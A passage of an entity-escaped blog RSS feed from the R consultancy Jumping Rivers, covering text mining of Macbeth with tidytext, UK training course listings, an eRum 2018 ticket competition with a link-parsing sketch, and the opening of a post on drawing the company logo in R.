&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;He downloaded the “Scottish Play” via the &lt;a href="https://cran.r-project.org/web/packages/gutenbergr/index.html" rel="external"&gt;Gutenbergr&lt;/a&gt; package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gutenberg_works&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Macbeth&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gutenberg_download&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;He then proceeded to generate a bar chart of the top \(10\) words (excluding stop words such as &lt;em&gt;and&lt;/em&gt; and &lt;em&gt;to&lt;/em&gt;), via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(word, text) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Make text tidy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(word, sort &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Count occurrences&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove stop words&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Select top 10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(word, n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="tidy.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;The two key parts of this code are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;unnest_tokens()&lt;/code&gt; - used to tidy the text;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;anti_join()&lt;/code&gt; - used to remove any &lt;code&gt;stop_words&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;During this “off the cuff” analysis, Dave noticed that we could easily extract the speaker. This is clearly something you would want to store, and it can be achieved via some &lt;code&gt;mutate()&lt;/code&gt; magic&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; macbeth &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(is_speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(text, &lt;span style="color:#a5d6ff"&gt;&amp;#34;^[A-Z ]+\\.$&amp;#34;&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Detect capital letters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(is_speaker, text, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; speaker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;na.locf&lt;/span&gt;(speaker, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;str_detect()&lt;/code&gt; call uses a simple regular expression to determine whether a line consists solely of capital letters and spaces followed by a full stop (thereby indicating a speaker). Every other line is given a missing value, &lt;code&gt;NA&lt;/code&gt;. We finish with the {zoo} &lt;code&gt;na.locf()&lt;/code&gt; function, which carries the last observation forward, thereby filling the blanks.&lt;/p&gt;
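&lt;p&gt;As a minimal sketch of these three steps, the same logic can be tried on a toy character vector. The vector &lt;code&gt;play_lines&lt;/code&gt; below is made up for illustration and is not the Gutenberg data used above.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;stringr&amp;#34;)
library(&amp;#34;zoo&amp;#34;)

# Hypothetical toy input: a stage direction, then speaker headings and dialogue
play_lines = c(&amp;#34;Thunder and lightning.&amp;#34;,
               &amp;#34;FIRST WITCH.&amp;#34;,
               &amp;#34;When shall we three meet again?&amp;#34;,
               &amp;#34;SECOND WITCH.&amp;#34;,
               &amp;#34;That will be ere the set of sun.&amp;#34;)

# TRUE only for lines made of capitals and spaces ending in a full stop
is_speaker = str_detect(play_lines, &amp;#34;^[A-Z ]+\\.$&amp;#34;)
# Keep the heading text for speaker lines, NA everywhere else
speaker = ifelse(is_speaker, play_lines, NA)
# Carry the last speaker forward; na.rm = FALSE keeps the leading NA
speaker = na.locf(speaker, na.rm = FALSE)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The first element stays &lt;code&gt;NA&lt;/code&gt; because nothing precedes it. Using &lt;code&gt;na.rm = FALSE&lt;/code&gt; keeps that leading &lt;code&gt;NA&lt;/code&gt;, so the result has the same length as the input, which is what &lt;code&gt;mutate()&lt;/code&gt; requires.&lt;/p&gt;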
&lt;p&gt;The resulting tibble is then cleaned using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;is_speaker, &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(speaker)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;is_speaker, &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;gutenberg_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(word, text) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A further bit of analysis gives&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;speaker_words &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(speaker, word, sort &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bind_tf_idf&lt;/span&gt;(word, speaker, n) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(tf_idf)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 107 x 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## speaker word n tf idf tf_idf&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 PORTER. knock 10 0.0847 3.09 0.262&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 ALL. double 6 0.0588 2.40 0.141&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 PORTER. knocking 6 0.0508 2.40 0.122&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 APPARITION. macbeth 5 0.143 0.788 0.113&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 LADY MACDUFF. thou 5 0.0394 1.30 0.0512&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 PORTER. sir 5 0.0424 1.15 0.0485&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 DUNCAN. thee 6 0.0270 1.30 0.0351&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 FIRST WITCH. macbeth 7 0.0417 0.788 0.0329&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 LADY MACBETH. wouldst 6 0.00825 3.78 0.0312&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 MACDUFF. scotland 8 0.0154 1.99 0.0306&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 97 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my opinion, the best part of the night was the lively question and answer session. The questions covered numerous topics (I didn’t write them down, sorry!), all of which Dave handled with ease, usually with another off-the-cuff demo.&lt;/p&gt;
&lt;h4 id="further-links"&gt;Further Links&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://edinbr.org/" rel="external"&gt;Edinburgh R user group&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Text mining with R: &lt;a href="http://amzn.to/2CDzvYD" rel="external"&gt;amazon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Dave Robinson: &lt;a href="https://twitter.com/drob" rel="external"&gt;twitter&lt;/a&gt;, &lt;a href="http://varianceexplained.org/about/" rel="external"&gt;blog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=h--HR7PWfp0" rel="external"&gt;Blackadder&lt;/a&gt; discusses the Scottish play&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/edinbr-text-mining-with-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R &amp; Python Machine Learning Courses</title><link>https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/</link><pubDate>Wed, 07 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hi there!&lt;/p&gt;
&lt;p&gt;We’re running some courses on R, Python and Tensorflow around the UK that you might be interested in! All courses are spearheaded with lectures by one of our first-class trainers. The lectures are interspersed with practicals and coffee breaks. Attendees get a set of in-depth notes to pair with the lecture. More details and information on prerequisite knowledge are available on our &lt;a href="https://www.jumpingrivers.com/training/all-courses/"&gt;course description page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;All participants must bring their own laptop.&lt;/p&gt;
&lt;h3 id="leeds-predictive-analytics-in-r"&gt;Leeds (Predictive Analytics in R)&lt;/h3&gt;
&lt;h4 id="predictive-analytics-in-r---feb-1314"&gt;Predictive Analytics in R - Feb 13/14&lt;/h4&gt;
&lt;p&gt;By the end of the course, participants will have the skills and knowledge to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Thoroughly understand popular analytical techniques practised in industry today.&lt;/li&gt;
&lt;li&gt;Understand which technique applies to their own data.&lt;/li&gt;
&lt;li&gt;Efficiently and effectively analyse their own data using said techniques in R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to analytics&lt;/li&gt;
&lt;li&gt;Simple regression problems&lt;/li&gt;
&lt;li&gt;Classification&lt;/li&gt;
&lt;li&gt;Model selection&lt;/li&gt;
&lt;li&gt;Advanced regression techniques&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/r-predictive-analytics-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h3 id="london-tensorflow"&gt;London (Tensorflow)&lt;/h3&gt;
&lt;h4 id="introduction-to-python---apr-0910"&gt;Introduction to Python - Apr 09/10&lt;/h4&gt;
&lt;p&gt;By the end of the course participants will be able to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand Python such that they can proficiently write reusable Python code&lt;/li&gt;
&lt;li&gt;write more efficient Python code using functions, If statements and While loops&lt;/li&gt;
&lt;li&gt;read, write and analyse their own data using Python&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The Python Syntax&lt;/li&gt;
&lt;li&gt;Data types&lt;/li&gt;
&lt;li&gt;Lists, Tuples and Dictionaries&lt;/li&gt;
&lt;li&gt;Loops, If and While&lt;/li&gt;
&lt;li&gt;Writing functions&lt;/li&gt;
&lt;li&gt;Dealing with files&lt;/li&gt;
&lt;li&gt;Pandas&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/introduction-python-data-science/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h4 id="python--tensorflow---apr-1112"&gt;Python &amp;amp; Tensorflow - Apr 11/12&lt;/h4&gt;
&lt;p&gt;Deep learning is a cutting edge machine learning technique for classification and regression. In the past few years it has produced state-of-the-art results in fields such as image classification, natural language processing, bioinformatics and robotics. This course will cover the main ideas of deep learning, and how to implement it in practice with tensorflow: a software framework for efficient and scalable deep learning.&lt;/p&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Supervised learning&lt;/li&gt;
&lt;li&gt;Multilayer perceptrons&lt;/li&gt;
&lt;li&gt;Training neural networks&lt;/li&gt;
&lt;li&gt;Deep learning&lt;/li&gt;
&lt;li&gt;Tuning&lt;/li&gt;
&lt;li&gt;Convolutional neural networks&lt;/li&gt;
&lt;li&gt;Scaling to big data using GPUs&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/python-tensorflow-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;h3 id="birmingham-python--machine-learning"&gt;Birmingham (Python &amp;amp; Machine Learning)&lt;/h3&gt;
&lt;h4 id="machine-learning-with-python---end-of-april"&gt;Machine learning with Python - end of April&lt;/h4&gt;
&lt;p&gt;This course will provide you with the fundamental tools you’ll need to prepare data and then train and test Machine Learning models.&lt;/p&gt;
&lt;p&gt;Topics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data frames&lt;/li&gt;
&lt;li&gt;Cleaning data&lt;/li&gt;
&lt;li&gt;Merging/joining data&lt;/li&gt;
&lt;li&gt;Grouping/aggregation on data&lt;/li&gt;
&lt;li&gt;Categorical data&lt;/li&gt;
&lt;li&gt;What is machine learning?&lt;/li&gt;
&lt;li&gt;Scikit-Learn&lt;/li&gt;
&lt;li&gt;Linear regression&lt;/li&gt;
&lt;li&gt;Logistic regression&lt;/li&gt;
&lt;li&gt;Decision trees&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This course will be led by &lt;a href="https://twitter.com/DataWookie" rel="external"&gt;Andrew Collier&lt;/a&gt;, a very experienced data scientist from South Africa!&lt;/p&gt;
&lt;p&gt;See the &lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning/"&gt;course page&lt;/a&gt; for booking details.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-python-machine-learning-courses/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Free ticket to eRum</title><link>https://www.jumpingrivers.com/blog/free-ticket-to-erum/</link><pubDate>Fri, 02 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/free-ticket-to-erum/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/free-ticket-to-erum/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So… big news.&lt;/p&gt;
&lt;p&gt;Jumping Rivers is sponsoring &lt;a href="http://2018.erum.io/" rel="external"&gt;eRum 2018&lt;/a&gt; and in light of this news we are giving away a free place at the conference!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(Not to mention our very own lead consultant, Colin Gillespie, is one of the invited speakers.)&lt;/em&gt;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-free-ticket-to-erum"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-main-competition"&gt;The Main Competition&lt;/h2&gt;
&lt;p&gt;Here at &lt;a href="https://jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we maintain the site &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;meetingsR&lt;/a&gt;. This comprises three comprehensive lists:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;All upcoming (and past) R conferences.&lt;/li&gt;
&lt;li&gt;All R useR groups from around the globe.&lt;/li&gt;
&lt;li&gt;All R-Ladies groups from around the globe.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;See the &lt;a href="https://github.com/jumpingrivers/meetingsR/" rel="external"&gt;GitHub repo&lt;/a&gt; for the contents.&lt;/p&gt;
&lt;p&gt;All we are asking for is a visualisation or dashboard of meetingsR. For example, it could be a visualisation of the useR group locations, or a dashboard based on the conference costs or …&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The best one wins a free place at eRum 2018!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To give the winner ample time to prepare for their trip to Budapest in May, the deadline will be &lt;strong&gt;5pm&lt;/strong&gt; on &lt;strong&gt;Monday 2nd April&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Not only that, but if we feel that the winner’s solution fits the meetingsR site, we’ll incorporate it in the site! Credit given, of course.&lt;/p&gt;
&lt;p&gt;Solutions should be e-mailed to &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt; and if possible they should be held on a public repository on something such as GitHub.&lt;/p&gt;
&lt;p&gt;Good luck!&lt;/p&gt;
&lt;h2 id="the-secondary-competition"&gt;The Secondary Competition&lt;/h2&gt;
&lt;p&gt;Regardless of the visualisation, we’ll need an R script to parse the current &lt;code&gt;.Rmd&lt;/code&gt; files and extract the conference and group URLs &amp;amp; locations. Rather than have everyone suffer parsing hell, we’ll send a free copy of &lt;a href="http://shop.oreilly.com/product/0636920047995.do" rel="external"&gt;Efficient R Programming&lt;/a&gt; to the first reasonable attempt at a parsing script (if we have a few scripts, we can send more than one copy).&lt;/p&gt;
&lt;p&gt;Just email &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
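&lt;p&gt;As a possible starting point for such a parsing script, here is a rough sketch that pulls markdown-style links out of lines of text using base R only. It assumes the entries are written as &lt;code&gt;[name](url)&lt;/code&gt; links; the sample lines in &lt;code&gt;rmd_lines&lt;/code&gt; are hypothetical, and the real &lt;code&gt;.Rmd&lt;/code&gt; files may be laid out differently.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical sample lines; in practice these would come from readLines()
rmd_lines = c(&amp;#34;## United Kingdom&amp;#34;,
              &amp;#34;* [EdinbR](http://edinbr.org/); Edinburgh&amp;#34;,
              &amp;#34;Some text without a link&amp;#34;)

# Capture the link text and the URL of the first markdown link on each line
pattern = &amp;#34;\\[([^]]+)\\]\\(([^)]+)\\)&amp;#34;
matches = regmatches(rmd_lines, regexec(pattern, rmd_lines))

# A successful match has three parts: whole match, link text, URL
has_link = lengths(matches) == 3
links = data.frame(
  name = vapply(matches[has_link], function(m) m[2], character(1)),
  url = vapply(matches[has_link], function(m) m[3], character(1)),
  stringsAsFactors = FALSE
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This only finds the first link on each line and ignores locations entirely, so it is a skeleton to build on rather than a finished entry.&lt;/p&gt;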
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Our Logo In R</title><link>https://www.jumpingrivers.com/blog/our-logo-in-r/</link><pubDate>Thu, 01 Feb 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/our-logo-in-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/our-logo-in-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/our-logo-in-r/plot4.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hi all. Given that our logo here at Jumping Rivers is a set of lines designed to look like a Gaussian Process, we thought it would be a neat idea to recreate this image in R. To do so we’re going to need a couple of packages. We do the usual &lt;code&gt;install.packages()&lt;/code&gt; dance (remember this step can be performed in &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;parallel&lt;/a&gt;).&lt;/p&gt;
